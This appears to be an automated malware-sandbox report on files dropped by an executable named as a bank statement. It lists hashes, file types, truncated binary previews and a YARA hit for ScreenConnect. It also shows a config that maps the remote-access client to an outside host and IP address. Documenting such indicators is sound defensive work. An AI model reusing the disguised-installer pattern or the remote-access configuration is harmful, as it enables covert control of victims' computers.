                                                                    SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):531456
                                                                    Entropy (8bit):6.031735419537473
                                                                    Encrypted:false
                                                                    SSDEEP:6144:ZPpB0+E5A976t5puf9NTh/k4dKRYJUYg7N+earZ5Ghfn55AJ6m/JaXAQKx4kEYYo:dpq+Ezuf9N0RYJZPUI6
                                                                    MD5:B319407E807BE1A49E366F7F8EA7EE2A
                                                                    SHA1:B12197A877FB7E33B1CB5BA11B0DA5CA706581BA
                                                                    SHA-256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
                                                                    SHA-512:DC497643790DC608DECE9C8FE7264EFEDD13724BD24C9BF28A60D848B405FDDEFB8337A60F3F32BB91518910E02C7A2AAF29FC32F86A464DFCAFA365526BDB7F
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0............../... ...@....... ...............................8....@.................................1/..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................e/......H........2..(.............................................................{9...*..{:...*V.(;.....}9.....}:...*...0..A........ur.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...*.*.*. ... )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X*...0..b........r...p......%..{9......%qu....u...-.&.+...u...oB....%..{:......%qv....v...-.&.+...v...oB....(C...*..{D...*..{E...*V.(;.....}D.....}E...*.0..A........uw.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...*.*.*. F.b# )UU.
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):22016
                                                                    Entropy (8bit):5.175549153463088
                                                                    Encrypted:false
                                                                    SSDEEP:384:JzV20obJRmvKpq/PAofzuua+CoFCU00HtphaU/GeHczrMRbJ1kjv9cU5yYoJRtWo:de8iyAofzuKjHtCsHcMw5yftWWbP
                                                                    MD5:B0585159161D50E330B7F8EDA50A2770
                                                                    SHA1:8636FAB3CE6C21A42D3E5FBD495C2DDAD4279162
                                                                    SHA-256:CA9E51D51F24E16428D1B0E9A0829A44DA2678BFC7BA00F0B46A57DCD6D734B8
                                                                    SHA-512:E9AE99BDCE64CA4282FA4580D3B081F7D0874C756AEF77FB58E10DB148E2F670BA48667CE62033C6F514FF825DC54C1BDBAE2C7F8D5F9355486402CF75E1D5AD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|>..........." ..0..N...........l... ........... ....................................@.................................Gl..O....................................k..8............................................ ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B................{l......H........2..x8...................k........................................(....*^.(......./...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..h.......s!......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~...... ...s....%......(...+%-.&+.(......."...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1716224
                                                                    Entropy (8bit):6.635479721420864
                                                                    Encrypted:false
                                                                    SSDEEP:24576:ZSjm7Fj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUw:Sm7JkGYYpT0+TFiH7efP
                                                                    MD5:29454A0CB83F28C24805E9A70E53444A
                                                                    SHA1:334202965B07AB69F08B16FED0EE6C7274463556
                                                                    SHA-256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
                                                                    SHA-512:62790920974A2F1B018D466AE3E3B5100006A3C8013F43BDB04AF7074CFE5D992CAAEB610DE2B1B72FF0E4ACF8762DB1513A4A0CF331F9A340AE0CE53C3BE895
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..(...........F... ...`....... ..............................lc....@..................................E..O....`.............................. E..8............................................ ............... ..H............text...(&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................E......H.......$...L...........p...0....D........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*f.{......(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L.......
                                                                    Process:C:\Users\user\Desktop\2024-11 eStmt 5563019.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2AB23E87-2E48-F825-88EA-423B8FFA6658}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb 21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):14196736
                                                                    Entropy (8bit):7.969683982407054
                                                                    Encrypted:false
                                                                    SSDEEP:196608:zws3V+aNws3V+nws3V+Hws3V+nws3V+mws3V+5ws3V+tws3V+:iaIe+eBso
                                                                    MD5:4C8DCA37051323BA5E9BB0C5442313BB
                                                                    SHA1:56DEB44AF473CA34DF2999151DFB313F6D95F0FB
                                                                    SHA-256:F5D6DB138A82A39CBA6F5FC3612782D8D72F16EEBD39B3FB4A5C1DE3FD0A6595
                                                                    SHA-512:81412B4D3F192A19FAD38AC182F3C72EC9A03C40D21A6335DAB4A42EF888D8FECBF07D7BA30739F3DD88D6180D431380D71509243501B7C6BBD801C5163CD172
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................=.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2AB23E87-2E48-F825-88EA-423B8FFA6658}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb 21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):14196736
                                                                    Entropy (8bit):7.969683982407054
                                                                    Encrypted:false
                                                                    SSDEEP:196608:zws3V+aNws3V+nws3V+Hws3V+nws3V+mws3V+5ws3V+tws3V+:iaIe+eBso
                                                                    MD5:4C8DCA37051323BA5E9BB0C5442313BB
                                                                    SHA1:56DEB44AF473CA34DF2999151DFB313F6D95F0FB
                                                                    SHA-256:F5D6DB138A82A39CBA6F5FC3612782D8D72F16EEBD39B3FB4A5C1DE3FD0A6595
                                                                    SHA-512:81412B4D3F192A19FAD38AC182F3C72EC9A03C40D21A6335DAB4A42EF888D8FECBF07D7BA30739F3DD88D6180D431380D71509243501B7C6BBD801C5163CD172
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................=.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2AB23E87-2E48-F825-88EA-423B8FFA6658}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb 21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):14196736
                                                                    Entropy (8bit):7.969683982407054
                                                                    Encrypted:false
                                                                    SSDEEP:196608:zws3V+aNws3V+nws3V+Hws3V+nws3V+mws3V+5ws3V+tws3V+:iaIe+eBso
                                                                    MD5:4C8DCA37051323BA5E9BB0C5442313BB
                                                                    SHA1:56DEB44AF473CA34DF2999151DFB313F6D95F0FB
                                                                    SHA-256:F5D6DB138A82A39CBA6F5FC3612782D8D72F16EEBD39B3FB4A5C1DE3FD0A6595
                                                                    SHA-512:81412B4D3F192A19FAD38AC182F3C72EC9A03C40D21A6335DAB4A42EF888D8FECBF07D7BA30739F3DD88D6180D431380D71509243501B7C6BBD801C5163CD172
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................=.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):430591
                                                                    Entropy (8bit):6.617267317474085
                                                                    Encrypted:false
                                                                    SSDEEP:6144:6uH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvess1:6uH2anwohwQUv5uH2anwohwQUvess1
                                                                    MD5:6045128099930EC0A07ED2DFEE0A4341
                                                                    SHA1:6CB85EFE4E9DB9BC763C1A6B42183DE2349DEE61
                                                                    SHA-256:E00FA4CC68F9FC0A78D2D511F7A0BDF1F3516F38C41F3B1E285811BEA9B065C9
                                                                    SHA-512:3B239E5D894EE97390E5D6A2BDFF58EFDC3B34D635A8B0E13B795920CC7BC7F1EA21E3E8D76A4D3C25E3C7302972B09771370C061CA5722F8FB2665843FBD10D
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI5684.tmp, Author: Joe Security
                                                                    Preview:...@IXOS.@.....@R.uY.@.....@.....@.....@.....@.....@......&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}'.ScreenConnect Client (d519fd2fdcfe66e7)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{2AB23E87-2E48-F825-88EA-423B8FFA6658}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (d519fd2fdcfe66e7)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{A15400AF-0154-8531-03AA-3964C8AD50B4}^.C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{8F5BA9AE-CC90-EF21-D44F-0DBE1F85167E}f.C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{05055D85-C9E6-4F6B-54D0-EB3AE0D12F70}c.C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.1622353688405849
                                                                    Encrypted:false
                                                                    SSDEEP:12:JSbX72FjirXAGiLIlHVRpMh/7777777777777777777777777vDHFsY3h2lp3XlN:JorXQI5cv3cb6F
                                                                    MD5:2CEAEE517A39CEA8BDD0711AB8F54A1F
                                                                    SHA1:436EA790AD2069A9BAAC8A39F68EB3B844CBF9F5
                                                                    SHA-256:ECD686055ABB127213F66BB3407E5AB527D7E8C0F3EED55E67147D7874A9E8B1
                                                                    SHA-512:F2EE51C2144DDF3C4B68C426985DCA1FDC2060D913FB0E4CE6C2BD401AAEC857154E1B83AE746DF4F96856FC7869E54FC8298106CDCD70F068CFB02E852133E0
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.8020962802812714
                                                                    Encrypted:false
                                                                    SSDEEP:48:Ut8PhDuRc06WX4uFT5x95dtPYqcq56AdufSioLUgakafd4PkeEDkCrMQLLomrmAB:UQhD1eFTDnPNpGfoLI7d4VElrxSF
                                                                    MD5:E6D239E2C73C8C1E125945346DFBE005
                                                                    SHA1:37F6CCFBCDEADA510F9B990E2FF55A838B0D7066
                                                                    SHA-256:96F5A9621CFEFD2576282462B02AB0291983F129207BFDAF94B067E5B5665D36
                                                                    SHA-512:86BF98106A06C40CD958626D50E2C9C805E1DFF684E833C889D4F5782A65AA89F495BE9D41A40B4E7BE43A98EA01DA7F5E86E06543AF3710C32FE8BADCBD8FC3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):7668
                                                                    Entropy (8bit):7.864444854228408
                                                                    Encrypted:false
                                                                    SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                    MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                    SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                    SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                    SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                    Malicious:false
                                                                    Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):432221
                                                                    Entropy (8bit):5.375183260804083
                                                                    Encrypted:false
                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauz:zTtbmkExhMJCIpEri
                                                                    MD5:6567146A824775EB13DCF520DB14F5F0
                                                                    SHA1:F864EAE9FB0145A45F390AAF1DC6718B0A629583
                                                                    SHA-256:3077685B218A6EF9146A515AB9F9A32D48E7446A8D59791A77697268F413AEC2
                                                                    SHA-512:164750E0BCC27CFDD10D680196E8166B64A54F3B7DD169D49D73440818796A9E5120B5A29BFBEA3521783D2206BE95D2A9D79C7A56513B870EAF27555A0CBCCF
                                                                    Malicious:false
                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):560
                                                                    Entropy (8bit):5.0568180109227
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOaI6wSwvQz/vXbAa3xT:2dL9hK6E46YPMIKvH
                                                                    MD5:A4ED1343BA23E14B51CBA9C6DD096019
                                                                    SHA1:31CCC2B687F95C77F178828DAAAA7BF679CC0F7B
                                                                    SHA-256:5F0B078561329ABEA7A02D5DAC40D7424AAA6B4F0F518107000FA07B9F0F8239
                                                                    SHA-512:7922C38A81F008AFD495568A8909B1E1CB84B4C5994D434BC9A1FA903A04665168E90BBEF35C91D4ACA71A3E119076846E77E8C059B8CD66AE204D279FFACAB6
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>bw36back93.site=176.123.1.130-22%2f11%2f2024%2000%3a34%3a38</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):560
                                                                    Entropy (8bit):5.0568180109227
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOaI6wSwvQz/vXbAa3xT:2dL9hK6E46YPMIKvH
                                                                    MD5:A4ED1343BA23E14B51CBA9C6DD096019
                                                                    SHA1:31CCC2B687F95C77F178828DAAAA7BF679CC0F7B
                                                                    SHA-256:5F0B078561329ABEA7A02D5DAC40D7424AAA6B4F0F518107000FA07B9F0F8239
                                                                    SHA-512:7922C38A81F008AFD495568A8909B1E1CB84B4C5994D434BC9A1FA903A04665168E90BBEF35C91D4ACA71A3E119076846E77E8C059B8CD66AE204D279FFACAB6
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>bw36back93.site=176.123.1.130-22%2f11%2f2024%2000%3a34%3a38</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1590
                                                                    Entropy (8bit):5.363907225770245
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                    MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                    SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                    SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                    SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.8020962802812714
                                                                    Encrypted:false
                                                                    SSDEEP:48:Ut8PhDuRc06WX4uFT5x95dtPYqcq56AdufSioLUgakafd4PkeEDkCrMQLLomrmAB:UQhD1eFTDnPNpGfoLI7d4VElrxSF
                                                                    MD5:E6D239E2C73C8C1E125945346DFBE005
                                                                    SHA1:37F6CCFBCDEADA510F9B990E2FF55A838B0D7066
                                                                    SHA-256:96F5A9621CFEFD2576282462B02AB0291983F129207BFDAF94B067E5B5665D36
                                                                    SHA-512:86BF98106A06C40CD958626D50E2C9C805E1DFF684E833C889D4F5782A65AA89F495BE9D41A40B4E7BE43A98EA01DA7F5E86E06543AF3710C32FE8BADCBD8FC3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):0.23495253029397775
                                                                    Encrypted:false
                                                                    SSDEEP:48:X+tDBAdufS3qcq56AdufSioLUgakafd4PkeEDkCrMQLLomrIT495d:XSxpGfoLI7d4VElrxOTW
                                                                    MD5:144CE8A482211A824DE37648D08721ED
                                                                    SHA1:1EBD7DECD5906D2506E2BAA7DAD712B65899B409
                                                                    SHA-256:8238FB3A420A15E4EDD1C8C4ADDE6F9FBC6A7426E25DAA335B1BA5AC2E0597EA
                                                                    SHA-512:DA9DE7B65AC09C211C1EB9EBCAA7C1C18B9AE79A4E187673A40A0A5B663BAC89FEA23389421007514B32CB250C31EB5BF4D84F6DD354EE6FF232C22A83B7D46E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4216858940245332
                                                                    Encrypted:false
                                                                    SSDEEP:48:94bubO+xFX4vT5hUe95dtPYqcq56AdufSioLUgakafd4PkeEDkCrMQLLomrmAduQ:ubwsTXNnPNpGfoLI7d4VElrxSF
                                                                    MD5:26A6CD3C43011EC0C4180CBA86547FDD
                                                                    SHA1:947CD9850F8B5BBCB502AD2E202ABC81536F5376
                                                                    SHA-256:148B8E44F1FCF900B565537D4CE7C90A5D8EDC0EDD774071AC1ECCCD6BD54474
                                                                    SHA-512:CAB56502EA0224E654EE8050CF1CC42953B3148A5C04A334D916DC3464E0865E9C401E30813533741BB96D6D4A05CEBA7697D80AACE28BF20F8F6E91EB2EB081
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
